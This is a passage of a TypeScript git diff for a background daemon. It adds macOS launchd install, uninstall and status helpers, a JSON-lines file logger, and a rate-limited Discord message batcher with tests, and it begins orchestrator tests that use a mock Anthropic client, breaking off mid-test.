+/** Return the canonical plist path under ~/Library/LaunchAgents/. */ +export function getPlistPath(): string { + return resolve(homedir(), 'Library', 'LaunchAgents', PLIST_FILENAME); +} + +/** + * Build the NVM-aware PATH string. + * Includes the directory containing the Node binary so that launchd can find node + * even when launched outside a shell session (where NVM isn't sourced). + */ +function buildEnvPath(nodePath: string): string { + const nodeBinDir = dirname(nodePath); + // Keep system essentials and prepend the node binary's directory + return `${nodeBinDir}:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin`; +} + +// --------------- plist generation --------------- + +/** Generate valid launchd plist XML for the GSD daemon. */ +export function generatePlist(opts: PlistOptions): string { + const home = homedir(); + const workDir = opts.workingDirectory ?? home; + const stdoutPath = opts.stdoutPath ?? resolve(home, '.gsd', 'daemon-stdout.log'); + const stderrPath = opts.stderrPath ?? resolve(home, '.gsd', 'daemon-stderr.log'); + const envPath = buildEnvPath(opts.nodePath); + + // Forward ANTHROPIC_API_KEY so the orchestrator LLM can authenticate. + // Captured at install time from the current process environment. + const anthropicKey = process.env.ANTHROPIC_API_KEY; + const anthropicKeyXml = anthropicKey + ? `\n\t\tANTHROPIC_API_KEY\n\t\t${escapeXml(anthropicKey)}` + : ''; + + return ` + + + +\tLabel +\t${escapeXml(LABEL)} + +\tProgramArguments +\t +\t\t${escapeXml(opts.nodePath)} +\t\t${escapeXml(opts.scriptPath)} +\t\t--config +\t\t${escapeXml(opts.configPath)} +\t + +\tKeepAlive +\t +\t\tSuccessfulExit +\t\t +\t + +\tRunAtLoad +\t + +\tEnvironmentVariables +\t +\t\tPATH +\t\t${escapeXml(envPath)} +\t\tHOME +\t\t${escapeXml(home)}${anthropicKeyXml} +\t + +\tWorkingDirectory +\t${escapeXml(workDir)} + +\tStandardOutPath +\t${escapeXml(stdoutPath)} + +\tStandardErrorPath +\t${escapeXml(stderrPath)} + + +`; +} + +// --------------- install / uninstall / status --------------- + +/** Default runCommand using execSync. */ +function defaultRunCommand(cmd: string): string { + return execSync(cmd, { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'] }); +} + +/** + * Install the launchd agent: write plist and load it. + * Idempotent — unloads first if already loaded. + */ +export function install( + opts: PlistOptions, + runCommand: RunCommandFn = defaultRunCommand, +): void { + const plistPath = getPlistPath(); + const xml = generatePlist(opts); + + // Unload first if already present (ignore errors) + if (existsSync(plistPath)) { + try { + runCommand(`launchctl unload ${plistPath}`); + } catch { + // already unloaded — fine + } + } + + writeFileSync(plistPath, xml, 'utf-8'); + chmodSync(plistPath, 0o644); + + runCommand(`launchctl load ${plistPath}`); + + // Verify it loaded + try { + runCommand(`launchctl list ${LABEL}`); + } catch { + throw new Error( + `Plist was written to ${plistPath} and launchctl load succeeded, but launchctl list ${LABEL} failed. The agent may not have started.`, + ); + } +} + +/** + * Uninstall the launchd agent: unload and remove plist. + * Graceful — does not throw if already uninstalled. + */ +export function uninstall(runCommand: RunCommandFn = defaultRunCommand): void { + const plistPath = getPlistPath(); + + if (existsSync(plistPath)) { + try { + runCommand(`launchctl unload ${plistPath}`); + } catch { + // already unloaded — that's fine + } + unlinkSync(plistPath); + } + // If plist doesn't exist, nothing to do — already uninstalled +} + +/** + * Query launchd for the daemon's status. + * Returns structured information about registration, PID, and last exit code. + * + * Handles two launchctl output formats: + * 1. Tabular: "PID\tStatus\tLabel" (older macOS) + * 2. JSON-style dict: `"PID" = 1234;` / `"LastExitStatus" = 0;` (newer macOS) + */ +export function status(runCommand: RunCommandFn = defaultRunCommand): LaunchdStatus { + try { + const output = runCommand(`launchctl list ${LABEL}`); + + // --- Try tabular format first --- + const lines = output.trim().split('\n'); + for (const line of lines) { + const parts = line.trim().split(/\t+/); + if (parts.length >= 3 && parts[2] === LABEL) { + const pidStr = parts[0]; + const statusStr = parts[1]; + + const pid = pidStr === '-' ? null : parseInt(pidStr, 10); + const lastExitStatus = statusStr != null ? parseInt(statusStr, 10) : null; + + return { + registered: true, + pid: Number.isNaN(pid!) ? null : pid, + lastExitStatus: Number.isNaN(lastExitStatus!) ? null : lastExitStatus, + }; + } + } + + // --- Try JSON-style dict format --- + // Matches: "PID" = 1234; or "LastExitStatus" = 0; + const pidMatch = output.match(/"PID"\s*=\s*(\d+)\s*;/); + const exitMatch = output.match(/"LastExitStatus"\s*=\s*(\d+)\s*;/); + + if (pidMatch || exitMatch) { + const pid = pidMatch ? parseInt(pidMatch[1], 10) : null; + const lastExitStatus = exitMatch ? parseInt(exitMatch[1], 10) : null; + return { + registered: true, + pid: Number.isNaN(pid!) ? null : pid, + lastExitStatus: Number.isNaN(lastExitStatus!) ? null : lastExitStatus, + }; + } + + // Label resolved (no error) but no parseable output — still registered + return { registered: true, pid: null, lastExitStatus: null }; + } catch { + // launchctl list exits non-zero when the label isn't found + return { registered: false, pid: null, lastExitStatus: null }; + } +} diff --git a/packages/daemon/src/logger.ts b/packages/daemon/src/logger.ts new file mode 100644 index 000000000..e65e5d4ea --- /dev/null +++ b/packages/daemon/src/logger.ts @@ -0,0 +1,88 @@ +import { createWriteStream, mkdirSync, type WriteStream } from 'node:fs'; +import { dirname } from 'node:path'; +import type { LogLevel, LogEntry } from './types.js'; + +const LEVEL_ORDER: Record = { + debug: 0, + info: 1, + warn: 2, + error: 3, +}; + +export interface LoggerOptions { + filePath: string; + level: LogLevel; + verbose?: boolean; +} + +/** + * Structured JSON-lines file logger. + * Writes LogEntry objects one per line in append mode. + * The open write stream keeps the Node event loop alive (daemon keepalive). + */ +export class Logger { + private readonly stream: WriteStream; + private readonly level: number; + private readonly verbose: boolean; + + constructor(opts: LoggerOptions) { + // Ensure parent directory exists + const dir = dirname(opts.filePath); + try { + mkdirSync(dir, { recursive: true }); + } catch (err: unknown) { + const msg = err instanceof Error ? err.message : String(err); + throw new Error(`Cannot create log directory ${dir}: ${msg}`); + } + + this.stream = createWriteStream(opts.filePath, { flags: 'a' }); + this.level = LEVEL_ORDER[opts.level] ?? LEVEL_ORDER.info; + this.verbose = opts.verbose ?? false; + } + + debug(msg: string, data?: Record): void { + this.write('debug', msg, data); + } + + info(msg: string, data?: Record): void { + this.write('info', msg, data); + } + + warn(msg: string, data?: Record): void { + this.write('warn', msg, data); + } + + error(msg: string, data?: Record): void { + this.write('error', msg, data); + } + + /** End the write stream. Resolves when the stream is fully flushed. */ + close(): Promise { + return new Promise((resolve, reject) => { + this.stream.end(() => { + this.stream.once('close', () => resolve()); + }); + this.stream.once('error', reject); + }); + } + + private write(level: LogLevel, msg: string, data?: Record): void { + if (LEVEL_ORDER[level] < this.level) return; + + const entry: LogEntry = { + ts: new Date().toISOString(), + level, + msg, + ...(data !== undefined ? { data } : {}), + }; + + const line = JSON.stringify(entry) + '\n'; + this.stream.write(line); + + if (this.verbose) { + const prefix = `[${entry.ts}] ${level.toUpperCase()}`; + const suffix = data ? ` ${JSON.stringify(data)}` : ''; + process.stderr.write(`${prefix}: ${msg}${suffix}\n`); + } + } +} diff --git a/packages/daemon/src/message-batcher.test.ts b/packages/daemon/src/message-batcher.test.ts new file mode 100644 index 000000000..c64cf803b --- /dev/null +++ b/packages/daemon/src/message-batcher.test.ts @@ -0,0 +1,308 @@ +import { describe, it, beforeEach, afterEach, mock } from 'node:test'; +import assert from 'node:assert/strict'; +import { MessageBatcher } from './message-batcher.js'; +import type { SendPayload, BatcherLogger } from './message-batcher.js'; +import type { FormattedEvent } from './types.js'; + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- + +/** Create a minimal FormattedEvent for testing. */ +function fakeEvent(content: string, hasEmbed = false): FormattedEvent { + const fe: FormattedEvent = { content }; + if (hasEmbed) { + // Minimal mock embed — just needs to be truthy and pass through + fe.embed = { data: { title: content } } as any; + } + return fe; +} + +/** Create a tracking send function. */ +function createSend() { + const calls: SendPayload[] = []; + const fn = mock.fn(async (payload: SendPayload) => { + calls.push(payload); + }); + return { fn, calls }; +} + +/** Create a logger that captures error/warn calls. */ +function createLogger() { + const errors: string[] = []; + const warns: string[] = []; + const debugs: string[] = []; + const logger: BatcherLogger = { + error(msg: string) { errors.push(msg); }, + warn(msg: string) { warns.push(msg); }, + debug(msg: string) { debugs.push(msg); }, + }; + return { logger, errors, warns, debugs }; +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +describe('MessageBatcher', () => { + describe('enqueue + capacity flush', () => { + it('flushes when buffer reaches maxBatchSize', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 3, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('a')); + batcher.enqueue(fakeEvent('b')); + assert.equal(calls.length, 0, 'should not flush yet'); + + batcher.enqueue(fakeEvent('c')); // hits capacity + // flush is async — give it a tick + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(calls.length, 1, 'should have flushed once'); + assert.equal(calls[0].content, 'a\nb\nc'); + assert.equal(batcher.pending, 0); + + await batcher.destroy(); + }); + + it('skips embeds for batched messages (only content)', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 2, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('a', true)); + batcher.enqueue(fakeEvent('b', true)); // triggers flush + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(calls.length, 1); + assert.equal(calls[0].embeds.length, 0, 'batched sends skip embeds to avoid duplication'); + assert.equal(calls[0].content, 'a\nb'); + + await batcher.destroy(); + }); + }); + + describe('enqueueImmediate', () => { + it('flushes pending buffer then sends immediately', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 10, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('buffered-1')); + batcher.enqueue(fakeEvent('buffered-2')); + + await batcher.enqueueImmediate(fakeEvent('blocker!')); + + // First call: the pending buffer flush + // Second call: the immediate event + assert.equal(calls.length, 2, 'should have two send calls'); + assert.equal(calls[0].content, 'buffered-1\nbuffered-2'); + assert.equal(calls[1].content, 'blocker!'); + assert.equal(batcher.pending, 0); + + await batcher.destroy(); + }); + + it('sends immediately when buffer is empty', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 10, flushIntervalMs: 60_000 }); + + await batcher.enqueueImmediate(fakeEvent('urgent')); + + assert.equal(calls.length, 1); + assert.equal(calls[0].content, 'urgent'); + + await batcher.destroy(); + }); + }); + + describe('timer-based flush', () => { + it('flushes on interval', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 50 }); + batcher.start(); + + batcher.enqueue(fakeEvent('timed-1')); + batcher.enqueue(fakeEvent('timed-2')); + + // Wait longer than flushIntervalMs + await new Promise((r) => setTimeout(r, 120)); + + assert.ok(calls.length >= 1, 'timer should have triggered at least one flush'); + assert.equal(calls[0].content, 'timed-1\ntimed-2'); + assert.equal(batcher.pending, 0); + + await batcher.destroy(); + }); + + it('stop prevents further timer flushes', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 30 }); + batcher.start(); + batcher.stop(); + + batcher.enqueue(fakeEvent('orphan')); + await new Promise((r) => setTimeout(r, 80)); + + assert.equal(calls.length, 0, 'no flush after stop'); + // Cleanup without triggering flush timer + batcher.stop(); // idempotent + // Manually drain for cleanup + await batcher.destroy(); + }); + }); + + describe('destroy', () => { + it('flushes remaining buffer on destroy', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('leftover-1')); + batcher.enqueue(fakeEvent('leftover-2')); + + await batcher.destroy(); + + assert.equal(calls.length, 1); + assert.equal(calls[0].content, 'leftover-1\nleftover-2'); + }); + + it('is idempotent — second destroy is no-op', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('once')); + await batcher.destroy(); + await batcher.destroy(); // second call + + assert.equal(calls.length, 1, 'only flushed once'); + }); + + it('enqueue after destroy is silently ignored', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 2, flushIntervalMs: 60_000 }); + await batcher.destroy(); + + batcher.enqueue(fakeEvent('post-destroy')); + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(calls.length, 0, 'no sends after destroy'); + }); + }); + + describe('empty buffer', () => { + it('flush of empty buffer is no-op', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 60_000 }); + batcher.start(); + + // Force a timer tick with an empty buffer + await new Promise((r) => setTimeout(r, 10)); + await batcher.destroy(); + + // Only the destroy-triggered flush, which should also be a no-op + assert.equal(calls.length, 0, 'no sends for empty buffer'); + }); + }); + + describe('single-item flush', () => { + it('handles a single item in buffer at destroy', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 100, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('solo')); + await batcher.destroy(); + + assert.equal(calls.length, 1); + assert.equal(calls[0].content, 'solo'); + assert.equal(calls[0].embeds.length, 0); + assert.equal(calls[0].components.length, 0); + }); + }); + + describe('error handling', () => { + it('logs error and continues when send throws', async () => { + let attempt = 0; + const sendFn = async () => { + attempt++; + throw new Error('Discord rate limit'); + }; + const { logger, errors, warns } = createLogger(); + const batcher = new MessageBatcher(sendFn, logger, { maxBatchSize: 2, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('x')); + batcher.enqueue(fakeEvent('y')); // triggers flush + // Wait for flush + retry + await new Promise((r) => setTimeout(r, 1500)); + + assert.ok(errors.length >= 1, 'should have logged an error'); + assert.ok(warns.length >= 1, 'should have logged a warning on retry failure'); + assert.equal(batcher.pending, 0, 'buffer cleared even on error'); + + // Batcher should still be alive — enqueue more + batcher.enqueue(fakeEvent('after-error')); + assert.equal(batcher.pending, 1, 'can still enqueue after error'); + + await batcher.destroy(); + }); + + it('succeeds on retry if first attempt fails', async () => { + let attempt = 0; + const calls: SendPayload[] = []; + const sendFn = async (payload: SendPayload) => { + attempt++; + if (attempt === 1) throw new Error('transient'); + calls.push(payload); + }; + const { logger, errors } = createLogger(); + const batcher = new MessageBatcher(sendFn, logger, { maxBatchSize: 2, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('retry-me')); + batcher.enqueue(fakeEvent('retry-too')); + // Wait for flush + retry delay + await new Promise((r) => setTimeout(r, 1500)); + + assert.equal(errors.length, 1, 'logged one error on first attempt'); + assert.equal(calls.length, 1, 'retry succeeded'); + assert.equal(calls[0].content, 'retry-me\nretry-too'); + + await batcher.destroy(); + }); + }); + + describe('buffer at exactly capacity', () => { + it('flushes at exactly maxBatchSize', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 4, flushIntervalMs: 60_000 }); + + batcher.enqueue(fakeEvent('1')); + batcher.enqueue(fakeEvent('2')); + batcher.enqueue(fakeEvent('3')); + assert.equal(calls.length, 0, 'not flushed at 3/4'); + + batcher.enqueue(fakeEvent('4')); // exactly at capacity + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(calls.length, 1); + assert.equal(calls[0].content, '1\n2\n3\n4'); + + await batcher.destroy(); + }); + }); + + describe('components handling', () => { + it('uses components from the last event that has them', async () => { + const { fn, calls } = createSend(); + const batcher = new MessageBatcher(fn, undefined, { maxBatchSize: 3, flushIntervalMs: 60_000 }); + + const fakeRow = { type: 'ActionRow', components: [] }; + batcher.enqueue(fakeEvent('no-components')); + batcher.enqueue({ content: 'with-components', components: [fakeRow] } as any); + batcher.enqueue(fakeEvent('also-no-components')); // triggers flush + + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(calls.length, 1); + assert.deepEqual(calls[0].components, [fakeRow]); + + await batcher.destroy(); + }); + }); +}); diff --git a/packages/daemon/src/message-batcher.ts b/packages/daemon/src/message-batcher.ts new file mode 100644 index 000000000..eb7625d10 --- /dev/null +++ b/packages/daemon/src/message-batcher.ts @@ -0,0 +1,216 @@ +/** + * message-batcher.ts — Rate-limit-aware message batcher for Discord. + * + * Accumulates FormattedEvent payloads and flushes them to a Discord channel + * respecting the 5 msg/5s rate limit. Supports: + * - Timer-based periodic flush (default 1.5s) + * - Capacity-based flush when buffer hits maxBatchSize + * - Immediate priority flush for blockers (bypasses batching) + * - Combining multiple embeds into a single send() call + * - Error isolation: send() failures are logged, never crash the batcher + */ + +import type { FormattedEvent } from './types.js'; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +/** Payload passed to the send callback — matches Discord TextChannel.send() shape. */ +export interface SendPayload { + content: string; + embeds: unknown[]; + components: unknown[]; +} + +/** Send callback abstraction. Returns void or a promise. */ +export type SendFn = (payload: SendPayload) => Promise | void; + +/** Logger interface — just needs error/warn/debug. */ +export interface BatcherLogger { + error(msg: string, data?: Record): void; + warn(msg: string, data?: Record): void; + debug(msg: string, data?: Record): void; +} + +/** MessageBatcher configuration options. */ +export interface BatcherOptions { + /** Interval between timed flushes in ms. Default: 1500 */ + flushIntervalMs?: number; + /** Max events before triggering an immediate capacity flush. Default: 4 */ + maxBatchSize?: number; +} + +// --------------------------------------------------------------------------- +// Default no-op logger +// --------------------------------------------------------------------------- + +const noopLogger: BatcherLogger = { + error() {}, + warn() {}, + debug() {}, +}; + +// --------------------------------------------------------------------------- +// MessageBatcher +// --------------------------------------------------------------------------- + +export class MessageBatcher { + private readonly send: SendFn; + private readonly logger: BatcherLogger; + private readonly flushIntervalMs: number; + private readonly maxBatchSize: number; + + private buffer: FormattedEvent[] = []; + private timer: ReturnType | null = null; + private flushing = false; + private destroyed = false; + + constructor(send: SendFn, logger?: BatcherLogger, options?: BatcherOptions) { + this.send = send; + this.logger = logger ?? noopLogger; + this.flushIntervalMs = options?.flushIntervalMs ?? 1500; + this.maxBatchSize = options?.maxBatchSize ?? 4; + } + + // ----------------------------------------------------------------------- + // Public API + // ----------------------------------------------------------------------- + + /** Start the periodic flush timer. */ + start(): void { + if (this.timer) return; // already running + this.timer = setInterval(() => { + void this.flush(); + }, this.flushIntervalMs); + // Don't hold the process open for the timer + if (this.timer && typeof this.timer === 'object' && 'unref' in this.timer) { + this.timer.unref(); + } + this.logger.debug('Batcher started', { flushIntervalMs: this.flushIntervalMs }); + } + + /** Stop the periodic flush timer without flushing. */ + stop(): void { + if (this.timer) { + clearInterval(this.timer); + this.timer = null; + } + this.logger.debug('Batcher stopped'); + } + + /** Flush remaining buffer and stop. Safe to call multiple times. */ + async destroy(): Promise { + if (this.destroyed) return; + this.destroyed = true; + this.stop(); + await this.flush(); + this.logger.debug('Batcher destroyed'); + } + + /** + * Enqueue a formatted event for batched sending. + * Triggers an immediate capacity flush if buffer reaches maxBatchSize. + */ + enqueue(formatted: FormattedEvent): void { + if (this.destroyed) return; + this.buffer.push(formatted); + if (this.buffer.length >= this.maxBatchSize) { + void this.flush(); + } + } + + /** + * Immediately send a high-priority event (e.g. blocker). + * Flushes any pending buffer first, then sends the priority event alone. + */ + async enqueueImmediate(formatted: FormattedEvent): Promise { + if (this.destroyed) return; + // Flush pending buffer first so ordering is preserved + await this.flush(); + // Send the priority event immediately, alone + await this.doSend([formatted]); + } + + /** Current number of events in the buffer (for testing/diagnostics). */ + get pending(): number { + return this.buffer.length; + } + + // ----------------------------------------------------------------------- + // Internal + // ----------------------------------------------------------------------- + + /** + * Flush the current buffer as a single Discord message. + * Multiple embeds are combined into one send() call (Discord supports up to 10). + * No-op if buffer is empty. + */ + private async flush(): Promise { + if (this.buffer.length === 0) return; + if (this.flushing) return; // prevent re-entrant flush + + this.flushing = true; + const batch = this.buffer.splice(0); // take all + try { + await this.doSend(batch); + } finally { + this.flushing = false; + } + } + + /** + * Build a SendPayload from a batch of FormattedEvents and invoke the send callback. + * Catches and logs errors — never throws. + * + * For batched messages (2+ events), we send content-only to avoid duplication + * between content text and embed descriptions, and to stay under Discord's + * 10-embed limit. Single-event sends include the embed for rich formatting. + */ + private async doSend(batch: FormattedEvent[]): Promise { + if (batch.length === 0) return; + + // Combine content lines + const content = batch.map((e) => e.content).join('\n'); + + // For single events, include the embed for rich formatting. + // For batches, skip embeds — the content lines are self-descriptive and + // embeds would duplicate the information + risk hitting Discord's 10-embed cap. + const embeds: unknown[] = []; + if (batch.length === 1 && batch[0].embed) { + embeds.push(batch[0].embed); + } + + // Collect all component rows (only from the last event with components — + // Discord only supports one set of components per message) + let components: unknown[] = []; + for (const e of batch) { + if (e.components && e.components.length > 0) { + components = e.components; + } + } + + const payload: SendPayload = { content, embeds, components }; + + try { + await this.send(payload); + } catch (err) { + const message = err instanceof Error ? err.message : String(err); + this.logger.error('Batcher send failed', { error: message, batchSize: batch.length }); + + // Retry once after a short delay + try { + await new Promise((r) => setTimeout(r, 1000)); + await this.send(payload); + this.logger.debug('Batcher retry succeeded'); + } catch (retryErr) { + const retryMessage = retryErr instanceof Error ? retryErr.message : String(retryErr); + this.logger.warn('Batcher retry also failed, dropping batch', { + error: retryMessage, + batchSize: batch.length, + }); + // Drop the batch — don't re-enqueue to prevent infinite loops + } + } + } +} diff --git a/packages/daemon/src/orchestrator.test.ts b/packages/daemon/src/orchestrator.test.ts new file mode 100644 index 000000000..21ea82ff5 --- /dev/null +++ b/packages/daemon/src/orchestrator.test.ts @@ -0,0 +1,584 @@ +/** + * Tests for Orchestrator — LLM agent for #gsd-control channel. + * + * Uses a MockAnthropicClient that simulates messages.create() responses, + * allowing tool execution and conversation flow testing without real API calls. + */ + +import { describe, it, afterEach } from 'node:test'; +import assert from 'node:assert/strict'; +import { mkdtempSync, rmSync, existsSync } from 'node:fs'; +import { join } from 'node:path'; +import { tmpdir } from 'node:os'; +import { randomUUID } from 'node:crypto'; +import { Orchestrator, type OrchestratorConfig, type OrchestratorDeps, type DiscordMessageLike } from './orchestrator.js'; +import { Logger } from './logger.js'; +import type { ManagedSession, ProjectInfo, SessionStatus, CostAccumulator } from './types.js'; + +// --------------------------------------------------------------------------- +// Helpers +// --------------------------------------------------------------------------- + +function tmpDir(): string { + return mkdtempSync(join(tmpdir(), `orch-test-${randomUUID().slice(0, 8)}-`)); +} + +const cleanupDirs: string[] = []; +const activeLoggers: Logger[] = []; + +async function cleanupAll(): Promise { + // Close all loggers first so write streams flush before dirs are removed + for (const logger of activeLoggers) { + try { await logger.close(); } catch { /* ignore */ } + } + activeLoggers.length = 0; + + while (cleanupDirs.length) { + const d = cleanupDirs.pop()!; + if (existsSync(d)) rmSync(d, { recursive: true, force: true }); + } +} + +// --------------------------------------------------------------------------- +// Mock Anthropic Client +// --------------------------------------------------------------------------- + +interface MockCreateParams { + model: string; + max_tokens: number; + system: string; + tools: unknown[]; + messages: unknown[]; +} + +type CreateHandler = (params: MockCreateParams) => { + stop_reason: string; + content: Array<{ type: string; text?: string; id?: string; name?: string; input?: unknown }>; +}; + +class MockAnthropicClient { + public createCallCount = 0; + public lastCreateParams: MockCreateParams | null = null; + private createHandler: CreateHandler; + + constructor(handler?: CreateHandler) { + this.createHandler = handler ?? MockAnthropicClient.defaultHandler; + } + + /** Default handler: returns a simple text response */ + static defaultHandler(): ReturnType { + return { + stop_reason: 'end_turn', + content: [{ type: 'text', text: 'Mock LLM response' }], + }; + } + + /** Handler that simulates a tool call then end_turn */ + static toolThenTextHandler(toolName: string, toolInput: unknown, finalText: string): CreateHandler { + let callCount = 0; + return () => { + callCount++; + if (callCount === 1) { + return { + stop_reason: 'tool_use', + content: [ + { + type: 'tool_use', + id: `toolu_${randomUUID().slice(0, 8)}`, + name: toolName, + input: toolInput, + }, + ], + }; + } + return { + stop_reason: 'end_turn', + content: [{ type: 'text', text: finalText }], + }; + }; + } + + /** Handler that throws an error */ + static errorHandler(message: string): CreateHandler { + return () => { + throw new Error(message); + }; + } + + messages = { + create: async (params: MockCreateParams) => { + this.createCallCount++; + this.lastCreateParams = params; + return this.createHandler(params); + }, + }; +} + +// --------------------------------------------------------------------------- +// Mock SessionManager +// --------------------------------------------------------------------------- + +function makeMockSession(overrides: Partial = {}): ManagedSession { + return { + sessionId: overrides.sessionId ?? 'sess-123', + projectDir: overrides.projectDir ?? '/home/user/project', + projectName: overrides.projectName ?? 'my-project', + status: overrides.status ?? ('running' as SessionStatus), + client: {} as ManagedSession['client'], + events: [], + pendingBlocker: null, + cost: overrides.cost ?? { totalCost: 0.1234, tokens: { input: 1000, output: 500, cacheRead: 0, cacheWrite: 0 } }, + startTime: overrides.startTime ?? Date.now() - 300_000, // 5 min ago + ...overrides, + }; +} + +class MockSessionManager { + public sessions: ManagedSession[] = []; + public startSessionCalls: Array<{ projectDir: string; command?: string }> = []; + public cancelSessionCalls: string[] = []; + public getResultCalls: string[] = []; + + async startSession(opts: { projectDir: string; command?: string }): Promise { + this.startSessionCalls.push(opts); + return 'sess-new-123'; + } + + getSession(sessionId: string): ManagedSession | undefined { + return this.sessions.find((s) => s.sessionId === sessionId); + } + + getAllSessions(): ManagedSession[] { + return this.sessions; + } + + async cancelSession(sessionId: string): Promise { + this.cancelSessionCalls.push(sessionId); + } + + getResult(sessionId: string): Record { + const session = this.sessions.find((s) => s.sessionId === sessionId); + if (!session) throw new Error(`Session not found: ${sessionId}`); + return { + sessionId: session.sessionId, + projectDir: session.projectDir, + projectName: session.projectName, + status: session.status, + durationMs: 300_000, + cost: session.cost, + recentEvents: [], + pendingBlocker: null, + error: null, + }; + } +} + +// --------------------------------------------------------------------------- +// Mock ChannelManager (unused by orchestrator directly, but required by deps) +// --------------------------------------------------------------------------- + +class MockChannelManager {} + +// --------------------------------------------------------------------------- +// Mock Discord Message +// --------------------------------------------------------------------------- + +function makeMessage(overrides: Partial<{ + authorId: string; + bot: boolean; + channelId: string; + content: string; +}>): DiscordMessageLike & { sentMessages: string[] } { + const sentMessages: string[] = []; + return { + author: { + id: overrides.authorId ?? 'owner-123', + bot: overrides.bot ?? false, + }, + channelId: overrides.channelId ?? 'control-channel-1', + content: overrides.content ?? 'hello', + channel: { + send: async (content: string) => { + sentMessages.push(content); + }, + sendTyping: async () => {}, + }, + sentMessages, + }; +} + +// --------------------------------------------------------------------------- +// Test Setup Factory +// --------------------------------------------------------------------------- + +function makeOrchestrator(opts?: { + client?: MockAnthropicClient; + sessions?: ManagedSession[]; + projects?: ProjectInfo[]; +}) { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'test.log'); + const logger = new Logger({ filePath: logPath, level: 'debug' }); + activeLoggers.push(logger); + + const sessionManager = new MockSessionManager(); + if (opts?.sessions) sessionManager.sessions = opts.sessions; + + const projects: ProjectInfo[] = opts?.projects ?? [ + { name: 'alpha', path: '/home/user/alpha', markers: ['git', 'node', 'gsd'], lastModified: Date.now() }, + { name: 'bravo', path: '/home/user/bravo', markers: ['git', 'rust'], lastModified: Date.now() }, + ]; + + const config: OrchestratorConfig = { + model: 'claude-sonnet-4-20250514', + max_tokens: 4096, + control_channel_id: 'control-channel-1', + }; + + const deps: OrchestratorDeps = { + sessionManager: sessionManager as unknown as OrchestratorDeps['sessionManager'], + channelManager: new MockChannelManager() as unknown as OrchestratorDeps['channelManager'], + scanProjects: async () => projects, + config, + logger, + ownerId: 'owner-123', + }; + + const mockClient = opts?.client ?? new MockAnthropicClient(); + const orchestrator = new Orchestrator(deps, mockClient as unknown as import('@anthropic-ai/sdk').default); + + return { orchestrator, mockClient, sessionManager, logger, logPath }; +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +describe('Orchestrator', () => { + // Clean up after each test so logger streams are flushed before dirs removed + afterEach(async () => { + await cleanupAll(); + }); + + // ---- Tool definitions ---- + + describe('tool definitions', () => { + it('passes 5 tools to the Anthropic API', async () => { + const { orchestrator, mockClient } = makeOrchestrator(); + const msg = makeMessage({ content: 'what can you do?' }); + await orchestrator.handleMessage(msg); + + assert.ok(mockClient.lastCreateParams); + const tools = mockClient.lastCreateParams.tools as Array<{ name: string }>; + assert.equal(tools.length, 5); + + const names = tools.map((t) => t.name).sort(); + assert.deepEqual(names, [ + 'get_session_detail', + 'get_status', + 'list_projects', + 'start_session', + 'stop_session', + ]); + }); + }); + + // ---- list_projects tool ---- + + describe('list_projects tool', () => { + it('returns project list from scanProjects', async () => { + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler('list_projects', {}, 'Here are your projects'), + ); + const { orchestrator } = makeOrchestrator({ client: mockClient }); + const msg = makeMessage({ content: 'list my projects' }); + await orchestrator.handleMessage(msg); + + assert.equal(msg.sentMessages.length, 1); + assert.equal(msg.sentMessages[0], 'Here are your projects'); + // The tool was called (2 create calls: tool_use + end_turn) + assert.equal(mockClient.createCallCount, 2); + }); + }); + + // ---- start_session tool ---- + + describe('start_session tool', () => { + it('calls sessionManager.startSession and returns confirmation', async () => { + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler( + 'start_session', + { projectPath: '/home/user/alpha' }, + 'Started session for alpha', + ), + ); + const { orchestrator, sessionManager } = makeOrchestrator({ client: mockClient }); + const msg = makeMessage({ content: 'start alpha' }); + await orchestrator.handleMessage(msg); + + assert.equal(sessionManager.startSessionCalls.length, 1); + assert.equal(sessionManager.startSessionCalls[0]!.projectDir, '/home/user/alpha'); + assert.equal(msg.sentMessages[0], 'Started session for alpha'); + }); + }); + + // ---- get_status tool ---- + + describe('get_status tool', () => { + it('returns formatted session status', async () => { + const session = makeMockSession({ projectName: 'alpha', status: 'running' as SessionStatus }); + const mockClient = new 